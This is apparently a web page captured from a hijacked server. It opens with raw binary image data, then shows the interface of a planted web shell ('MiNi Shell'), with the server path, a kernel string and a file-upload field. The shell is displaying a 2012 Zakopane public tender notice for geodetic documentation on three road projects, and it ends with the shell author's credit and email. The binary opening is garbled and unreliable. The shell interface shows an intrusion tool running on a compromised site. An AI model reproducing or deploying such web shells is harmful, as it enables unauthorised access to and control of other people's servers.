JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120727/163547-N-2012.html

<p class="kh_header"><b>Zakopane: BZP.271.77.2012 świadczenie na rzecz Zamawiającego usługi polegającej 
na opracowaniu dokumentacji geodezyjnej w ramach realizacji zadań inwestycyjnych:
1.	nr 2011/17 Przebudowa ul. Zaryckiego w Zakopanem,
2.	nr 2011/76 Przebudowa odcinka ulicy w rejonie skrzyżowania i skrzyżowania 
ul. Harenda-Króle wraz z odwodnieniem ,
3.	nr 2011/54 Przebudowa skrzyżowania ul. Droga na Bystre, ul. Droga do Olczy, 
ul. Karłowicza</b><br>
<b>Numer ogłoszenia: 163547 - 2012; data zamieszczenia: 27.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.77.2012 świadczenie na rzecz Zamawiającego usługi polegającej 
na opracowaniu dokumentacji geodezyjnej w ramach realizacji zadań inwestycyjnych:
1.	nr 2011/17 Przebudowa ul. Zaryckiego w Zakopanem,
2.	nr 2011/76 Przebudowa odcinka ulicy w rejonie skrzyżowania i skrzyżowania 
ul. Harenda-Króle wraz z odwodnieniem ,
3.	nr 2011/54 Przebudowa skrzyżowania ul. Droga na Bystre, ul. Droga do Olczy, 
ul. Karłowicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3. Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usługi polegającej 
na opracowaniu dokumentacji geodezyjnej w ramach realizacji zadań inwestycyjnych:
1.	nr 2011/17 Przebudowa ul. Zaryckiego w Zakopanem 
2.	nr 2011/76  Przebudowa odcinka ulicy w rejonie skrzyżowania i skrzyżowania 
ul. Harenda-Króle wraz z odwodnieniem ,
3.	nr 2011/54 Przebudowa skrzyżowania ul. Droga na Bystre, ul. Droga do Olczy, 
ul. Karłowicza.


3.1.	Zakres przedmiotu zamówienia obejmuje opracowanie dokumentacji geodezyjnej  dotyczącej:
3.1.1.	 Zadanie I - sporządzenie projektów podziału nieruchomości nr ewid.: 400/1, 397/1, 392/1, 105/1, 18/3 obr. 153 położonych na terenie Gminy Miasto Zakopane w trybie art. 98 Ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (t.j. Dz.U. z 2010r., nr 102 poz. 651 z późn. zm.), w ramach realizacji zadania inw. nr 2011/17 Przebudowa ul. Zaryckiego w Zakopanem 
3.1.2.	 Zadanie II - wydzielenie ciał hipotecznych nieruchomości objętych obszarem, jak na załączonym szkicu, obejmującym zakres dokumentacji technicznej drogi dla zadania nr 2011/76 Przebudowa odcinka ulicy w rejonie skrzyżowania 
i skrzyżowania ul. Harenda-Króle wraz z odwodnieniem,
3.1.3.	 Zadanie III- wydzielenie ciał hipotecznych nieruchomości objętych obszarem, jak na załączonym szkicu obejmującym zakres dokumentacji technicznej drogi dla zadania nr 2011/54 Przebudowa skrzyżowania ul. Droga na Bystre, ul. Droga do Olczy, ul. Karłowicza.

Uwaga:
W przypadku, gdy dane ewidencyjne nieruchomości podlegających podziałowi, ujawnione w księgach wieczystych, różnią się od danych ewidencyjnych zawartych 
w rejestrze ewidencji gruntów, w ramach zamówienia wchodzi również sporządzenie wykazu synchronizacyjnego dla nieruchomości.
3.2.Forma opracowania  dokumentacji geodezyjnej dla każdego z zadań :
3.2.1.	w formie papierowej w ilości 7 egzemplarzy:
3.2.1.1.	 dla każdego projektu podziału  nieruchomość  wraz z uzyskaniem klauzuli Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Zakopanem.
3.2.2.	dla każdego wydzielonego ciała hipotecznego, wraz z uzyskaniem klauzuli Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Zakopanem, w ramach każdego zadania.
3.2.2.	Projekty podziału powinny być opracowane zgodnie z obowiązującymi przepisami, w    tym w szczególności:
3.2.2.1.	Ustawie  z dnia 21   sierpnia  1997r.  o  gospodarce  nieruchomości (t. j. Dz. U. z 2010r. nr 102 poz. 651 z późn. zm.)
3.2.2.2.	Ustawie z dnia 17 maja 1989r. prawo geodezyjne i kartograficzne (t.j. 
 Dz. U. z 2010r., nr 193 poz. 1287 z późn. zm.)
3.2.2.3.	Ustawie z dnia 21 marca 1985r. o drogach publicznych (Dz. U. z 2000r., nr 71, poz. 838 z późn. zm.).

3.3.	Zamawiający wymaga aby wykonawca  udzielił co najmniej 36 miesięcznej gwarancji na świadczone usługi objęte zamówieniem danego zadania
3.4.	Zamawiający wymaga aby wykonawca  udzielił co najmniej 12 miesięcznej  rękojmi na świadczone usługi objęte zamówieniem danego zadania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                 oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                 oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                 oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony ,jeżeli  wykonawca wykaże, ze do realizacji zamówienia dysponuje co najmniej jedną osobą posiadającą uprawnienia zawodowe w dziedzinie geodezji i kartografii z zakresu II - rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych, zgodnie z art. 43 pkt 2 ustawy z dnia 17 maja 1989r. prawo geodezyjne i kartograficzne (t.j., Dz. U. z 2010r., nr 193 poz. 1287 z późn. zm.),

        
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia   
                           lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
                           do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                 oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający informuje, że przewiduje   
           możliwość zmiany umowy :
- W przypadku zwłoki w świadczeniu usług objętych postępowaniem, z przyczyn nie leżących po stronie wykonawcy , zamawiający dopuszcza możliwość przedłużenia terminu wykonania umowy  - w formie aneksu - na podstawie pisemnego umotywowanego wniosku wykonawcy, zaakceptowanego przez zamawiającego .

-W trakcie obowiązywania umowy  zamawiający  dopuszcza zmianę cen wyłącznie w przypadku ustawowej zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji
Urząd Miasta Zakopane
ul.Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8
Urząd Miasta Zakopane
ul.Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świadczenie na rzecz Zamawiającego usługi polegającej 
na opracowaniu dokumentacji geodezyjnej w ramach realizacji zadania inwestycyjnego nr 2011/17 Przebudowa ul. Zaryckiego w Zakopanem,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3. Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usługi polegającej 
na opracowaniu dokumentacji geodezyjnej w ramach realizacji zadań inwestycyjnych:
nr 2011/17 Przebudowa ul. Zaryckiego w Zakopanem

3.1.	Zakres przedmiotu zamówienia obejmuje opracowanie dokumentacji geodezyjnej  dotyczącej  sporządzenie projektów podziału nieruchomości nr ewid.: 400/1, 397/1, 392/1, 105/1, 18/3 obr. 153 położonych na terenie Gminy Miasto Zakopane w trybie art. 98 Ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (t.j. Dz.U. z 2010r., nr 102 poz. 651 z późn. zm.), w ramach realizacji zadania inw. nr 2011/17 Przebudowa ul. Zaryckiego w Zakopanem ,


Uwaga:
W przypadku, gdy dane ewidencyjne nieruchomości podlegających podziałowi, ujawnione w księgach wieczystych, różnią się od danych ewidencyjnych zawartych 
w rejestrze ewidencji gruntów, w ramach zamówienia wchodzi również sporządzenie wykazu synchronizacyjnego dla nieruchomości.
3.2.Forma opracowania  dokumentacji geodezyjnej :
3.2.1.	w formie papierowej w ilości 7 egzemplarzy:
3.2.1.1.	 dla każdego projektu podziału  nieruchomość  wraz z uzyskaniem klauzuli Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Zakopanem.
3.2.2.	dla każdego wydzielonego ciała hipotecznego, wraz z uzyskaniem klauzuli Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Zakopanem, w ramach każdego zadania.
3.2.2.	Projekty podziału powinny być opracowane zgodnie z obowiązującymi przepisami, w    tym w szczególności:
3.2.2.1.	Ustawie  z dnia 21   sierpnia  1997r.  o  gospodarce  nieruchomości (t. j. Dz. U. z 2010r. nr 102 poz. 651 z późn. zm.)
3.2.2.2.	Ustawie z dnia 17 maja 1989r. prawo geodezyjne i kartograficzne (t.j. 
 Dz. U. z 2010r., nr 193 poz. 1287 z późn. zm.)
3.2.2.3.	Ustawie z dnia 21 marca 1985r. o drogach publicznych (Dz. U. z 2000r., nr 71, poz. 838 z późn. zm.).

3.3.	Zamawiający wymaga aby wykonawca  udzielił co najmniej 36 miesięcznej gwarancji na świadczone usługi objęte zamówieniem danego zadania
3.4.	Zamawiający wymaga aby wykonawca  udzielił co najmniej 12 miesięcznej  rękojmi na świadczone usługi objęte zamówieniem danego zadania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> świadczenie na rzecz Zamawiającego usługi polegającej 
na opracowaniu dokumentacji geodezyjnej w ramach realizacji zadania  inwestycyjnego
nr 2011/76 przebudowa odcinka ulicy w rejonie skrzyżowania i skrzyżowania 
ul. Harenda-Króle wraz z odwodnieniem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usługi polegającej 
na opracowaniu dokumentacji geodezyjnej w ramach realizacji zadania  inwestycyjnego
nr 2011/76 przebudowa odcinka ulicy w rejonie skrzyżowania i skrzyżowania 
ul. Harenda-Króle wraz z odwodnieniem.
Zakres przedmiotu zamówienia obejmuje opracowanie dokumentacji geodezyjnej  dotyczącej   wydzielenia ciał hipotecznych nieruchomości objętych obszarem, jak na załączonym szkicu, obejmującym zakres dokumentacji technicznej drogi dla zadania nr 2011/76 Przebudowa odcinka ulicy w rejonie skrzyżowania 
i skrzyżowania ul. Harenda-Króle wraz z odwodnieniem
Uwaga:
W przypadku, gdy dane ewidencyjne nieruchomości podlegających podziałowi, ujawnione w księgach wieczystych, różnią się od danych ewidencyjnych zawartych 
w rejestrze ewidencji gruntów, w ramach zamówienia wchodzi również sporządzenie wykazu synchronizacyjnego dla nieruchomości.
3.2.Forma opracowania  dokumentacji geodezyjnej dla każdego z zadań :
3.2.1.	w formie papierowej w ilości 7 egzemplarzy:
3.2.1.1.	 dla każdego projektu podziału  nieruchomość  wraz z uzyskaniem klauzuli Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Zakopanem.
3.2.2.	dla każdego wydzielonego ciała hipotecznego, wraz z uzyskaniem klauzuli Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Zakopanem, w ramach każdego zadania.
3.2.2.	Projekty podziału powinny być opracowane zgodnie z obowiązującymi przepisami, w    tym w szczególności:
3.2.2.1.	Ustawie  z dnia 21   sierpnia  1997r.  o  gospodarce  nieruchomości (t. j. Dz. U. z 2010r. nr 102 poz. 651 z późn. zm.)
3.2.2.2.	Ustawie z dnia 17 maja 1989r. prawo geodezyjne i kartograficzne (t.j. 
 Dz. U. z 2010r., nr 193 poz. 1287 z późn. zm.)
3.2.2.3.	Ustawie z dnia 21 marca 1985r. o drogach publicznych (Dz. U. z 2000r., nr 71, poz. 838 z późn. zm.).

3.3.	Zamawiający wymaga aby wykonawca  udzielił co najmniej 36 miesięcznej gwarancji na świadczone usługi objęte zamówieniem danego zadania
3.4.	Zamawiający wymaga aby wykonawca  udzielił co najmniej 12 miesięcznej  rękojmi na świadczone usługi objęte zamówieniem danego zadania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> świadczenie na rzecz Zamawiającego usługi polegającej 
na opracowaniu dokumentacji geodezyjnej w ramach realizacji zadania inwestycyjnego
nr 2011/54 Przebudowa skrzyżowania ul. Droga na Bystre, ul. Droga do Olczy, 
ul. Karłowicza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usługi polegającej 
na opracowaniu dokumentacji geodezyjnej w ramach realizacji zadania inwestycyjnego
nr 2011/54 Przebudowa skrzyżowania ul. Droga na Bystre, ul. Droga do Olczy, 
ul. Karłowicza


Zakres przedmiotu zamówienia obejmuje opracowanie dokumentacji geodezyjnej  dotyczącej wydzielenie ciał hipotecznych nieruchomości objętych obszarem, jak na załączonym szkicu obejmującym zakres dokumentacji technicznej drogi dla zadania nr 2011/54 Przebudowa skrzyżowania ul. Droga na Bystre, ul. Droga do Olczy, ul. Karłowicza.

Uwaga:
W przypadku, gdy dane ewidencyjne nieruchomości podlegających podziałowi, ujawnione w księgach wieczystych, różnią się od danych ewidencyjnych zawartych 
w rejestrze ewidencji gruntów, w ramach zamówienia wchodzi również sporządzenie wykazu synchronizacyjnego dla nieruchomości.
3.2.Forma opracowania  dokumentacji geodezyjnej dla każdego z zadań :
3.2.1.	w formie papierowej w ilości 7 egzemplarzy:
3.2.1.1.	 dla każdego projektu podziału  nieruchomość  wraz z uzyskaniem klauzuli Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Zakopanem.
3.2.2.	dla każdego wydzielonego ciała hipotecznego, wraz z uzyskaniem klauzuli Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami Starostwa Powiatowego w Zakopanem, w ramach każdego zadania.
3.2.2.	Projekty podziału powinny być opracowane zgodnie z obowiązującymi przepisami, w    tym w szczególności:
3.2.2.1.	Ustawie  z dnia 21   sierpnia  1997r.  o  gospodarce  nieruchomości (t. j. Dz. U. z 2010r. nr 102 poz. 651 z późn. zm.)
3.2.2.2.	Ustawie z dnia 17 maja 1989r. prawo geodezyjne i kartograficzne (t.j. 
 Dz. U. z 2010r., nr 193 poz. 1287 z późn. zm.)
3.2.2.3.	Ustawie z dnia 21 marca 1985r. o drogach publicznych (Dz. U. z 2000r., nr 71, poz. 838 z późn. zm.).

3.3.	Zamawiający wymaga aby wykonawca  udzielił co najmniej 36 miesięcznej gwarancji na świadczone usługi objęte zamówieniem danego zadania
3.4.	Zamawiający wymaga aby wykonawca  udzielił co najmniej 12 miesięcznej  rękojmi na świadczone usługi objęte zamówieniem danego zadania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com